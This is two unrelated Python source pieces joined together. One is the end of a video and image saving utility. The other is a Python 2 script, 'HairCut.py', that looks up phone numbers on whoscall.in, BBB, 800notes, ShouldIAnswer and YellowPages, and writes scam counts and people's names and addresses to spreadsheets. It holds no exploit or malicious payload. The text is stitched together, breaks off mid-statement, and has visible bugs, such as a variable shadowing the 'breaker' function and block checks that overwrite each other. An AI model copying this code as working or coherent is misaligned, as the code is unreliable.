clip.close()
def create_video_subproc(
frames: List[np.ndarray],
path: str,
filename: str,
extension: str = ".gif",
fps: int = 15,
daemon: bool = True,
):
"""
Create video with a subprocess, since it takes a lot of time for ``moviepy``
to encode the video file.
See Also:
:func:`.create_video`
Note:
if ``daemon`` is true, then this function cannot be used in a
daemonic subprocess.
Args:
frames: A list of numpy arrays of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the video.
filename: File name.
extension: File extension.
fps: frames per second.
daemon: Whether launching the saving process as a daemonic process.
Returns:
A wait function, once called, block until creation has finished.
"""
def wait():
pass
if frames:
p = get_context("spawn").Process(
target=create_video, args=(frames, path, filename, extension, fps)
)
p.daemon = daemon
p.start()
def wait():
p.join()
return wait
def numpy_array_to_pil_image(image: np.ndarray):
if np.issubdtype(image.dtype, np.integer):
image = image.astype(np.uint8)
elif np.issubdtype(image.dtype, np.floating):
image = (image * 255).astype(np.uint8)
if image.ndim == 2:
# consider as a grey scale image
image = np.repeat(image[:, :, np.newaxis], 3, axis=2)
image = Image.fromarray(image)
return image
def create_image(image: np.ndarray, path: str, filename: str, extension: str = ".png"):
"""
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the image.
filename: File name.
extension: File extension.
"""
image = numpy_array_to_pil_image(image)
image.save(os.path.join(path, filename + extension))
def create_image_subproc(
image: np.array,
path: str,
filename: str,
extension: str = ".png",
daemon: bool = True,
):
"""
Create image with a subprocess.
See Also:
:func:`.create_image`
Note:
if ``daemon`` is true, then this function cannot be used in a
daemonic subprocess.
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the image.
filename: File name.
extension: File extension.
daemon: Whether launching the saving process as a daemonic process.
Returns:
A wait function, once called, block until creation has finished.
"""
p = get_context("spawn").Process(
target=create_image, args=(image, path, filename, extension)
)
p.daemon = daemon
p.start()
def wait():
p.join()
return wait
|
HairCut.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from bs4 import BeautifulSoup
from collections import defaultdict
from datetime import *
from dateutil.relativedelta import *
from Harvard import enumColumn
from os.path import join, dirname, abspath
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from shutil import copyfile
from shutil import move
from xlrd.sheet import ctype_text
import csv
import datetime
import glob
import itertools
import logging
import numpy as np
import os
import re
import requests
import selenium.webdriver.support.ui as ui
import sys
import threading
import time
import xlrd
import xlsxwriter
import xlwt
# Full Definitions
bbbEnd = '&locationText=&locationLatLng=&page=1'
bbbUrl = 'https://www.bbb.org/en/us/search?inputText='
bbbUrlAC = 'https://www.bbb.org/en/us/search?accreditedFilter=1&inputText='
breaker = 0
breakerLoop = 0
countitup = 1
dCount = 0
debtCount = 0
delMe = 0
done = False
hospitalCount = 0
lastComments = 0
locality = ""
now = datetime.datetime.now()
notNow = now - relativedelta(years=1)
numFormat = '3'
postal = ""
reset = 0
scamCount = 0
spamCount = 0
street = ""
# Get the people address.
def addressPeople(soup):
for elm in soup.select(".address"):
element = str(elm)
stopPoint = element.index('>')
address = element[stopPoint + 2:]
caret = address.index('<')
address = address[:caret]
address = " ".join(address.split())
worksheet.write(idx + 1, 3, address)
# Get the business address.
def addressBus(street, locality, postal, soup):
for elm in soup.select(".street-address"):
street = str(elm.text)
for elm in soup.select(".locality"):
locality = str(elm.text)
for elm in soup.select(".adr"):
postal = str(elm.text)
if street and locality and postal != "":
element = street + ", " + locality + postal[-5:]
worksheet.write(idx + 1, 7, element)
# Wait out my mistake.
def blocked(soup):
block = soup.find(text=re.compile(r"has been blocked"))
block = soup.find(text=re.compile(r"returning an unknown error"))
block = soup.find(text=re.compile(r"Gateway time-out"))
type(block) is str
if block is not None:
print("\n Ugh. I'm gonna go talk to the host of the site real quick. Should take an hour or two."
)
time.sleep(7200)
# Break if no chromedriver.
def breaker():
done = True
print("\nPlease refer to the Readme, you don't have chromedriver.exe anywhere!")
time.sleep(15)
sys.exit()
# Number of Entries
def businessEntries(soup):
noMatch = soup.find(text=re.compile(r"Showing"))
type(noMatch) is str
if noMatch is None:
howMany = soup.find_all('div', {'class': 'media-thumbnail'})
howLen = len(howMany)
worksheet.write(idx + 1, 4, howLen)
worksheet.write(idx + 1, 5, '1')
# Business Name
def businessName(soup):
for elm in soup.select(".info"):
element = str(elm)
stopPoint = element.index('span itemprop="name">')
busName = element[stopPoint:]
busName = busName[busName.index('>') + 1:busName.index('<')]
worksheet.write(idx + 1, 6, busName)
# Call Center
def callCenter(element):
global callNum
callNum = "0"
if "Call centre" in element:
stopPoint = element.index('Call centre')
callNum = element[stopPoint - 6:stopPoint - 2]
callNum = re.sub("[^0-9]", "", callNum)
worksheet.write(idx + 1, 4, callNum)
# Category None
def cateNone():
if all(value == "0" for value in cateTerms.values()) == True:
sentiment = "No Categories"
worksheet.write(idx + 1, 14, sentiment)
# Category Listing
def categoryKiddo(soup):
for elm in soup.select(".categories"):
element = str(elm.text)
element.replace("Categories", "")
callCenter(element)
teleMarker(element)
serVice(element)
debtColl(element)
comPany(element)
scamCom(element)
unSol(element)
nuiCall(element)
nonProfit(element)
cateSet()
sentiment = max(cateTerms, key=cateTerms.get)
worksheet.write(idx + 1, 14, sentiment)
cateNone()
# Category Setter
def cateSet():
global cateTerms
cateTerms = {
'Call Center': callNum,
'Telemarketer': teleNum,
'Service Number': servNum,
'Debt Collector': debtNum,
'Company': compNum,
'Scam': scamNum,
'Unsolicited': unNum,
'Nuisance': nuiNum,
'Non-Profit': nonNum,
}
# Check the entry!
def checkMe(website):
if website == 'd':
while website not in ['1', '2', '3', '4', '5', 'A']:
print('Try Again.\n')
website = raw_input('Input 1 for whoscall.in results, input 2 for BBB, input 3 for 800Notes, \ninput 4 for ShouldIAnswer, input 5 for YellowPages\n>')
cleaner()
else:
while website not in ['1', '2', '3', '4', '5', 'A', 'd']:
print('Try Again.\n')
website = raw_input('Input 1 for whoscall.in results, input 2 for BBB, input 3 for 800Notes, \ninput 4 for ShouldIAnswer, input 5 for YellowPages\n>')
cleaner()
# Open chromedriver with options.
def chromeOpen(breaker):
global driver
if os.path.isfile('chrome.ini'):
ini = open('chrome.ini', 'r')
locationString = ini.read()
if os.path.exists(r"C:/chromedriver.exe"):
locationString = r"C:/chromedriver.exe"
elif os.path.isfile('chromedriver.exe'):
locationString = 'chromedriver.exe'
else:
breaker()
driverOpen(webdriver)
# Clean the screen.
def cleaner():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
# Company Comments on Should I Answer
def comPany(element):
global compNum
compNum = "0"
if "Company" in element:
stopPoint = element.index('Company')
compNum = element[stopPoint - 6:stopPoint - 2]
compNum = re.sub("[^0-9]", "", compNum)
worksheet.write(idx + 1, 8, compNum)
# Compare Results for Maximum
def compareResults(scamCount, spamCount, column, debtCount):
global sentiment
searchTerms = {r"Scam": scamCount,
'Spam': spamCount,
'Debt Collector': debtCount,}
sentiment = max(searchTerms, key=searchTerms.get)
worksheet.write(idx + 1, column, sentiment)
# Debt Collector count for Should I Answer
def debtColl(element):
global debtNum
debtNum = "0"
if "Debt collector" in element:
stopPoint = element.index('Debt collector')
debtNum = element[stopPoint - 6:stopPoint - 2]
debtNum = re.sub("[^0-9]", "", debtNum)
worksheet.write(idx + 1, 7, debtNum)
# DriverOpen
def driverOpen(webdriver):
global driver
driver = webdriver.Chrome()
driver.set_window_position(4000, 651)
# EqualBoy - Are these Equal?
def EqualBoy(scamCount, spamCount, debtCount, worksheet):
if(scamCount == spamCount == debtCount):
worksheet.write(idx + 1, 7, "Equal")
# Search for latest date.
def lastDate(soup):
for elm in soup.select(".oos_contletList time"):
worksheet.write(idx + 1, 9, str(elm.text))
element = str(elm.text)
if "ago" in element:
worksheet.write(idx + 1, 9, now.strftime("%d %b %Y"))
# How many of these were posted in the last year?
def lastYear(lastComments, reset, soup, worksheet):
for elm in soup.select(".oos_contletList time"):
element = str(elm.text)
if reset == 1:
lastComments = 0
if "ago" in element:
commentTime = now.strftime("%d %b %Y")
commentTime = now.strptime(commentTime, "%d %b %Y")
else:
commentTime = now.strptime(elm.text, "%d %b %Y")
if commentTime > notNow:
lastComments += 1
worksheet.write(idx + 1, 10, lastComments)
# Loading Animation that plays when the user is running a file.
def loading():
for s in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading ' + s)
sys.stdout.flush()
time.sleep(0.1)
# Negative Boy
def negativeBoy(element):
global negNumbers
negNumbers = "0"
if "negative" in element:
stopPoint = element.index('negative')
negNumbers = element[stopPoint - 6:stopPoint - 2]
negNumbers = re.sub("[^0-9]", "", negNumbers)
worksheet.write(idx + 1, 1, negNumbers)
# Neutral Boy
def neutralBoy(element):
global neuNumbers
neuNumbers = "0"
if "neutral" in element:
stopPoint = element.index('neutral')
neuNumbers = element[stopPoint - 6:stopPoint - 2]
neuNumbers = re.sub("[^0-9]", "", neuNumbers)
worksheet.write(idx + 1, 2, neuNumbers)
# No Boys
def NoBoys(scamCount, spamCount, debtCount, worksheet):
if(scamCount == 0 and spamCount == 0 and debtCount == 0):
worksheet.write(idx + 1, 7, "No Entries Detected")
# Non Profit ShouldIAnswer
def nonProfit(element):
global nonNum
nonNum = "0"
if "Non-profit Organization" in element:
stopPoint = element.index('Non-profit Organization')
nonNum = element[stopPoint - 6:stopPoint - 2]
nonNum = re.sub("[^0-9]", "", nonNum)
worksheet.write(idx + 1, 12, nonNum)
# Nuisance Caller ShouldIAnswer
def nuiCall(element):
global nuiNum
nuiNum = "0"
if "Nuisance call" in element:
stopPoint = element.index('Nuisance call')
nuiNum = element[stopPoint - 6:stopPoint - 2]
nuiNum = re.sub("[^0-9]", "", nuiNum)
worksheet.write(idx + 1, 11, nuiNum)
# Number of Pages
def peoplePages(soup):
for elm in soup.select(".result-top-left-detail"):
element = str(elm)
stopPoint = element.index('Showing')
pageNum = element[stopPoint + 18:]
caret = pageNum.index('<')
pageNum = pageNum[:caret]
pageNum = re.sub("[^0-9]", "", pageNum)
worksheet.write(idx + 1, 1, pageNum)
# Person Name Get!
def personName(soup):
for elm in soup.select(".result-left"):
element = str(elm)
stopPoint = element.index('sbp')
perName = element[stopPoint + 5:]
caret = perName.index('<')
perName = perName[:caret]
worksheet.write(idx + 1, 2, perName)
# Positive Boy
def positiveBoy(element):
global posNumbers
posNumbers = "0"
if "positive" in element:
stopPoint = element.index('positive')
posNumbers = element[stopPoint - 6:stopPoint - 2]
posNumbers = re.sub("[^0-9]", "", posNumbers)
worksheet.write(idx + 1, 3, posNumbers)
# PrepareCSV preps a CSV for EXCELence
def PrepareCSV(preName, fileName):
global fname
global totalName
totalName = preName + '.xlsx'
excelFile = xlsxwriter.Workbook(totalName)
worksheet = excelFile.add_worksheet()
enumColumn(fileName, worksheet)
excelFile.close()
fname = join(dirname(abspath('__file__')), '%s' % totalName)
print('Temporary Convert to xlsx done.\n')
# Ratings Board - Majority of ShouldIAnswer
def ratingsKiddo(soup):
for elm in soup.select(".ratings"):
element = str(elm.text)
element.replace("Ratings", "")
negativeBoy(element)
neutralBoy(element)
positiveBoy(element)
shouldTerm()
sentiment = max(shouldTerms, key=shouldTerms.get)
worksheet.write(idx + 1, 13, sentiment)
# ScamSpam
def ScamSpam(scamCount, spamCount, worksheet):
if(scamCount == spamCount):
worksheet.write(idx + 1, 7, "Scam/Spam")
# Scam Com
def scamCom(element):
global scamNum
scamNum = "0"
if "Scam call" in element:
stopPoint = element.index('Scam call')
scamNum = element[stopPoint - 6:stopPoint - 2]
scamNum = re.sub("[^0-9]", "", scamNum)
worksheet.write(idx + 1, 9, scamNum)
# ScamDebt
def ScamDebt(spamCount, debtCount, worksheet):
if(scamCount == debtCount):
worksheet.write(idx + 1, 7, "Scam/Debt")
# Service Comments on Should I Answer
def serVice(element):
global servNum
servNum = "0"
if "Service" in element:
stopPoint = element.index('Service')
servNum = element[stopPoint - 6:stopPoint - 2]
servNum = re.sub("[^0-9]", "", servNum)
worksheet.write(idx + 1, 6, servNum)
# shouldTerms
def shouldTerm():
global shouldTerms
shouldTerms = {
r"Positive": int(posNumbers),
'Neutral': int(neuNumbers),
'Negative': int(negNumbers),
}
# SpamDebt
def SpamDebt(spamCount, debtCount, worksheet):
if(spamCount == debtCount):
worksheet.write(idx + 1, 7, "Spam/Debt")
# Telemarketer Should I Answer Listingsh
def teleMarker(element):
global teleNum
teleNum = "0"
if "Telemarketer" in element:
stopPoint = element.index('Telemarketer')
teleNum = element[stopPoint - 6:stopPoint - 2]
teleNum = re.sub("[^0-9]", "", teleNum)
worksheet.write(idx + 1, 5, teleNum)
# TimeoutHandler that takes care of webDriver fails.
def TimeOutHandler(driver, webdriver, worksheet):
driver.close()
worksheet.write(idx + 1, 7, 'Timeout Exception')
breakerLoop = 1
# Unsolicited Call handling
def unSol(element):
global unNum
unNum = "0"
if "Unsolicited call" in element:
stopPoint = element.index('Unsolicited call')
unNum = element[stopPoint - 6:stopPoint - 2]
unNum = re.sub("[^0-9]", "", unNum)
worksheet.write(idx + 1, 10, unNum)
# Create a UTF-8 Workbook.
book = xlwt.Workbook(encoding='utf-8')
# Assign a User-Agent to python.
headers = \
{'User-Agent':
'Chrome/39.0.2171.95 Safari/537.36 AppleWebKit/537.36 (KHTML, like Gecko)'}
# Create a worksheet named "Results".
worksheet = book.add_sheet('Results', cell_overwrite_ok=True)
# Join the dragged files to create strings.
dragNDrop = ''.join(sys.argv[1:2])
dragNDrop2 = ''.join(sys.argv[2:3])
# Was a file dragged onto the Batch file?
# If not the string "dragNDrop" will be empty and the user will be prompted.
if dragNDrop == '':
fileName = raw_input('''
Input the file with extension
>''')
else:
# Obtain the fileName only by removing the directory name.
fileOnly = dragNDrop.rfind('\\') + 1
fileName = dragNDrop[fileOnly:]
# Was a site given in the Batch file?
# If not the string "dragNDrop2" will be empty and the user will be prompted.
if dragNDrop2 == '':
website = raw_input(
'Input 1 for whoscall.in results, input 2 for BBB, input 3 for 800Notes, \ninput 4 for ShouldIAnswer, input 5 for YellowPages\n>')
else:
website = dragNDrop2
# No more bad inputs!
checkMe(website)
# Find the period in the file, which determines the prepRev or extension, and the fileName.
stopPoint = fileName.index('.')
prepRev = fileName[stopPoint:]
preName = fileName[:stopPoint]
nestedName = "WorkingDir/" + preName + "/" + preName
# Make sure we're still encoding in UTF. Don't want any mistakes now, do we?
reload(sys)
sys.setdefaultencoding('utf')
# Is the extension CSV? If so we'll convert it to xlsx.
if prepRev == '.csv':
PrepareCSV(preName, fileName)
# Get ready for XLRD to parse the original file (or the converted one).
try:
fname
except NameError:
fname = join(dirname(abspath('__file__')), '%s' % fileName)
# Parse it XLRD!
xl_workbook = xlrd.open_workbook(fname)
sheet_names = xl_workbook.sheet_names()
xl_sheet = xl_workbook.sheet_by_name(sheet_names[0])
# If the user types "d" for the website choice, they will be prompted again, but, this time given debug info.
if website == 'd':
cleaner()
website = raw_input('Input 1 for whoscall.in results, input 2 for BBB, input 3 for 800Notes, \ninput 4 for ShouldIAnswer, input 5 for YellowPages\n>')
checkMe(website=website)
logging.basicConfig(level=logging.DEBUG)
logging.debug('Only shown in debug mode')
# Start the little spinny animation.
g = threading.Thread(target=loading)
g.start()
stopPoint = fileName.index('.')
prepRev = fileName[0:stopPoint]
if website == '1':
totalName = prepRev + '_rev_who.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, '# of Messages')
worksheet.write(0, 2, 'Does it Appear?')
worksheet.write(0, 3, 'Number of Scammers')
worksheet.write(0, 4, 'Number of Spammers')
worksheet.write(0, 5, 'Number of Debt Collectors')
worksheet.write(0, 6, 'Number of Hospital')
worksheet.write(0, 7, 'Sentiment')
siteType = '_rev_who.xlsx'
if website == '2':
chromeOpen(breaker)
driver.set_page_load_timeout(600)
totalName = prepRev + '_rev_BBB.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Accredited')
siteType = '_rev_BBB.xlsx'
if website == '3':
chromeOpen(breaker)
driver.set_page_load_timeout(600)
totalName = prepRev + '_rev_800notes.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Approximate Number of Messages')
worksheet.write(0, 2, 'Number of Pages')
worksheet.write(0, 3, 'Number of Scammers')
worksheet.write(0, 4, 'Number of Spammers')
worksheet.write(0, 5, 'Number of Debt Collectors')
worksheet.write(0, 6, 'Number of Hospital')
worksheet.write(0, 7, 'Sentiment')
worksheet.write(0, 8, 'Last Year')
worksheet.write(0, 9, 'Last Date of Comment')
worksheet.write(0, 10, 'Number of Comments in the Last Year')
siteType = '_rev_800notes.xlsx'
if website == '4':
chromeOpen(breaker)
driver.set_page_load_timeout(600)
totalName = prepRev + '_rev_ShouldI.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Negative Reviews')
worksheet.write(0, 2, 'Neutral Reviews')
worksheet.write(0, 3, 'Positive Reviews')
worksheet.write(0, 4, 'Number of Call Center Comments')
worksheet.write(0, 5, 'Number of Telemarketer Comments')
worksheet.write(0, 6, 'Number of Service Comments')
worksheet.write(0, 7, 'Number of Debt Collector Comments')
worksheet.write(0, 8, 'Number of Company Comments')
worksheet.write(0, 9, 'Number of Scam Comments')
worksheet.write(0, 10, 'Number of Unsolicited Comments')
worksheet.write(0, 11, 'Number of Nuisance Call Comments')
worksheet.write(0, 12, 'Number of Non-Profit Comments')
worksheet.write(0, 13, 'Sentiment')
worksheet.write(0, 14, 'Category Sentiment')
siteType = '_rev_ShouldI.xlsx'
if website == '5':
chromeOpen(breaker)
driver.set_page_load_timeout(600)
totalName = prepRev + '_rev_YellowPages.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Number of Pages - People')
worksheet.write(0, 2, 'Name of Person')
worksheet.write(0, 3, 'Address - People')
worksheet.write(0, 4, 'Number of Listings - Business')
worksheet.write(0, 5, 'Number of Pages - Business')
worksheet.write(0, 6, 'Name of Business')
worksheet.write(0, 7, 'Address - Business')
siteType = '_rev_800notes.xlsx'
if website == 'A':
totalName = prepRev + '_rev_Reviewnotes.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Review Note')
siteType = '_rev_Reviewnotes.xlsx'
# Set column to A:A, the first column.
worksheet.set_column('A:A', 13)
# Read the slice from the first cell to the last accessible row in Excel.
col = xl_sheet.col_slice(0, 1, 1048576)
# Read each string line by line.
for (idx, cell_obj) in enumerate(col):
cell_type_str = ctype_text.get(cell_obj.ctype, 'unknown type')
cell_obj_str = str(cell_obj)
# Cut the numbers to their appropriate format.
# Does a dash, parenthesis, or none of those exist? That will decide the numFormat.
if '-' in cell_obj_str:
firstStart = cell_obj_str.index('-') - 3
firstEnd = firstStart + 3
secondStart = cell_obj_str.index('-') + 1
secondEnd = secondStart + 3
thirdStart = cell_obj_str.index('-') + 5
thirdEnd = thirdStart + 4
teleWho = cell_obj_str[firstStart:firstEnd] + cell_obj_str[secondStart:secondEnd] + cell_obj_str[thirdStart:thirdEnd]
teleBBB = cell_obj_str[firstStart:firstEnd] + cell_obj_str[secondStart:secondEnd] + cell_obj_str[thirdStart:thirdEnd]
tele800 = '1-' + cell_obj_str[firstStart:firstEnd] + '-' + cell_obj_str[secondStart:secondEnd] + '-' + cell_obj_str[thirdStart:thirdEnd]
elif '(' in cell_obj_str:
firstStart = cell_obj_str.index('(') + 1
firstEnd = firstStart + 3
secondStart = cell_obj_str.index(' ') + 1
secondEnd = secondStart + 3
thirdStart = cell_obj_str.index('-') + 1
thirdEnd = thirdStart + 4
teleWho = cell_obj_str[firstStart:firstEnd] + cell_obj_str[secondStart:secondEnd] + cell_obj_str[thirdStart:thirdEnd]
teleBBB = cell_obj_str[firstStart:firstEnd] + cell_obj_str[secondStart:secondEnd] + cell_obj_str[thirdStart:thirdEnd]
tele800 = '1-' + cell_obj_str[firstStart:firstEnd] + '-' + cell_obj_str[secondStart:secondEnd] + '-' + cell_obj_str[thirdStart:thirdEnd]
else:
teleWho = cell_obj_str[8:11] + cell_obj_str[11:14] + cell_obj_str[14:18]
teleBBB = cell_obj_str[8:11] + cell_obj_str[11:14] + cell_obj_str[14:18]
tele800 = '1-' + cell_obj_str[8:11] + '-' + cell_obj_str[11:14] + '-' + cell_obj_str[14:18]
worksheet.write(idx + 1, 0, '1' + teleWho)
# WhosCallin Scrapes using the python Requests library. Nice and clean.
if website == '1':
reqInput = 'http://whoscall.in/1/%s/' % teleWho
time.sleep(1)
requestRec = requests.get(reqInput)
soup = BeautifulSoup(requestRec.content, 'lxml')
noMatch = soup.find(text=re.compile(r"no reports yet on the phone number"))
type(noMatch) is str
if noMatch is None:
worksheet.write(idx + 1, 2, 'Got a hit')
# Check for number of comments.
howMany = soup.find_all('img', {'src': '/default-avatar.gif'})
howManyAreThere = len(howMany)
worksheet.write(idx + 1, 1, howManyAreThere)
# Search for text on the sites that indicates their sentiment and generate the top response.
scamNum = [div for div in soup.find_all('div',{'style': 'font-size:14px; margin:10px; overflow:hidden'})
if 'scam' in div.text.lower() or r"Scam" in div.text.lower() or 'scams' in div.text.lower()]
scamCount = len(scamNum)
spamNum = [div for div in soup.find_all('div',{'style': 'font-size:14px; margin:10px; overflow:hidden'})
if 'spam' in div.text.lower() or 'Spam' in div.text.lower() or 'spams'in div.text.lower()]
spamCount = len(spamNum)
debtNum = [div for div in soup.find_all('div',{'style': 'font-size:14px; margin:10px; overflow:hidden'})
if 'debt' in div.text.lower() or 'Debt' in div.text.lower() or 'credit' in div.text.lower()]
debtCount = len(debtNum)
hospitalNum = [div for div in soup.find_all('div',{'style': 'font-size:14px; margin:10px; overflow:hidden'})
if 'hospital' in div.text.lower() or r"Hospital" in div.text.lower() or 'medical' in div.text.lower()]
hospitalCount = len(hospitalNum)
worksheet.write(idx + 1, 3, scamCount)
worksheet.write(idx + 1, 4, spamCount)
worksheet.write(idx + 1, 5, debtCount)
worksheet.write(idx + 1, 6, hospitalCount)
# Hospitals are important to look at, so I boost them.
compareResults(scamCount, spamCount, 7, debtCount)
NoBoys(scamCount, spamCount, debtCount, worksheet)
EqualBoy(scamCount, spamCount, debtCount, worksheet)
ScamSpam(scamCount, spamCount, worksheet)
ScamDebt(spamCount, debtCount, worksheet)
SpamDebt(spamCount, debtCount, worksheet)
if(hospitalCount > 0):
worksheet.write(idx + 1, 7, "Hospital")
# BBB, the beginning!
if website == '2':
# Selenium, get that site for me! (bbbUrl + bbbEnd are defined above)
driver.get(bbbUrl + teleBBB + bbbEnd)
time.sleep(1)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
Hit = soup.find_all('aside', {'class': 'search-result__aside'})
# Cloned the previous section, but, with changes to the URL via bbbUrlAC.
driver.get(bbbUrlAC + teleBBB + bbbEnd)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
Badge = soup.find_all('aside', {'class': 'search-result__aside'})
if len(Hit) != 0:
worksheet.write(idx + 1, 1, 'Got a Hit')
if len(Badge) != 0:
worksheet.write(idx + 1, 1, 'Is Accredited')
# 800Notes, the big one.
if website == '3':
try:
driver.get('http://800notes.com/Phone.aspx/%s' % tele800)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
time.sleep(2)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
# This entry doesn't exist if this regex succeeds.
noMatch = soup.find(text=re.compile(r"Report the call using the form"))
soup.prettify()
type(noMatch) is str
# Make sure we don't get blocked, and if we do, wait it out.
blocked(soup)
worksheet.write(idx + 1, 8, '|X|')
if noMatch is None and breakerLoop == 0:
try:
driver.get('http://800notes.com/Phone.aspx/%s/10000' % tele800)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
blocked(soup)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
curSite = driver.current_url
pageExist = soup.find('a', class_='oos_i_thumbDown')
type(pageExist) is str
if pageExist is not None:
if curSite.count('/') > 4:
curBegin = curSite.rfind('/') + 1
curEnd = curBegin + 4
pageNum = curSite[curBegin:curEnd]
else:
pageNum = 1
numMessages = int(pageNum) - 1
twentyNums = numMessages * 20
thumbs = soup.find_all('a', {'class': 'oos_i_thumbDown'})
thumbPlus = len(thumbs) + int(twentyNums)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
lastDate(soup)
time.sleep(2)
if pageExist is not None and breakerLoop == 0:
while int(countitup) != int(pageNum) + 1:
try:
if countitup == 1:
driver.get('http://800notes.com/Phone.aspx/{}'.format(tele800))
else:
driver.get('http://800notes.com/Phone.aspx/{}/{}/'.format(tele800, countitup))
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
lastYear(lastComments, reset, soup, worksheet)
reset = 0
countitup = int(countitup) + 1
if countitup % 2 == 0:
time.sleep(5)
else:
time.sleep(4)
scamNum = soup.find_all('div',
class_='oos_contletBody',
text=re.compile(r"Scam",
flags=re.IGNORECASE))
spamNum = soup.find_all(text=re.compile(r"Call type: Telemarketer"))
debtNum = soup.find_all(text=re.compile(r"Call type: Debt collector"))
hospitalNum = soup.find_all('div',
class_='oos_contletBody',
text=re.compile(r"Hospital",
flags=re.IGNORECASE))
scamCount += len(scamNum)
spamCount += len(spamNum)
debtCount += len(debtNum)
hospitalCount += len(hospitalNum)
blocked(soup)
reset = 1
worksheet.write(idx + 1, 1, thumbPlus)
worksheet.write(idx + 1, 3, scamCount)
worksheet.write(idx + 1, 4, spamCount)
worksheet.write(idx + 1, 5, debtCount)
worksheet.write(idx + 1, 6, hospitalCount)
compareResults(scamCount, spamCount, 7, debtCount)
NoBoys(scamCount, spamCount, debtCount, worksheet)
EqualBoy(scamCount, spamCount, debtCount, worksheet)
if(sentiment == "Scam" or sentiment == "Spam"):
ScamSpam(scamCount, spamCount, worksheet)
if(sentiment == "Scam" or sentiment == "Debt Collector"):
ScamDebt(spamCount, debtCount, worksheet)
if(sentiment == "Spam" or sentiment == "Debt Collector"):
SpamDebt(spamCount, debtCount, worksheet)
if(hospitalCount > 0):
worksheet.write(idx + 1, 7, "Hospital")
countitup = 1
debtCount = 0
hospitalCount = 0
scamCount = 0
spamCount = 0
worksheet.write(idx + 1, 2, int(pageNum))
# ShouldIAnswer, Community Requested.
if website == '4':
try:
driver.get(
'https://www.shouldianswer.com/phone-number/%s' % teleBBB)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
time.sleep(20)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
# This entry doesn't exist if this regex succeeds.
noMatch = soup.find(text=re.compile(r"PAGE NOT FOUND"))
soup.prettify()
type(noMatch) is str
# Make sure we don't get blocked, and if we do, wait it out.
blocked(soup)
if noMatch is None:
ratingsKiddo(soup)
categoryKiddo(soup)
if website == '5':
try:
driver.get('https://people.yellowpages.com/reversephonelookup?phone=%s&site=79' % teleBBB)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
time.sleep(5)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
# This entry doesn't exist if this regex succeeds.
noMatch = soup.find(text=re.compile(r"didn't find any results for"))
soup.prettify()
type(noMatch) is str
# Make sure we don't get blocked, and if we do, wait it out.
blocked(soup)
if noMatch is None:
peoplePages(soup)
personName(soup)
addressPeople(soup)
try:
driver.get('https://www.yellowpages.com/search?search_terms=%s' % teleBBB)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
time.sleep(5)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
fivehundred = soup.find(text=re.compile(r"Internal Server Error"))
soup.prettify()
type(fivehundred) is str
while fivehundred != None:
time.sleep(20)
driver.get(
'https://www.yellowpages.com/search?search_terms=%s' % teleBBB)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
fivehundred = soup.find(text=re.compile(r"Internal Server Error"))
soup.prettify()
type(fivehundred) is str
secondMatch = soup.find(text=re.compile(r"We did not find any business"))
soup.prettify()
type(secondMatch) is str
blocked(soup)
if secondMatch is None:
businessEntries(soup)
businessName(soup)
addressBus(street, locality, postal, soup)
# My last addition. Full composition brief note taker.
if website == 'A':
if dragNDrop != '':
nestedName = preName
if(os.path.isfile(nestedName + "_rev_YellowPages.xlsx")):
workman = xlrd.open_workbook(nestedName + "_rev_YellowPages.xlsx")
workboy = workman.sheet_by_name('Sheet1')
busName = workboy.cell(idx + 1, 6).value
busAddy = workboy.cell(idx + 1, 7).value
else:
busName = ""
busAddy = ""
if(os.path.isfile(nestedName + "_rev_800notes.xlsx")):
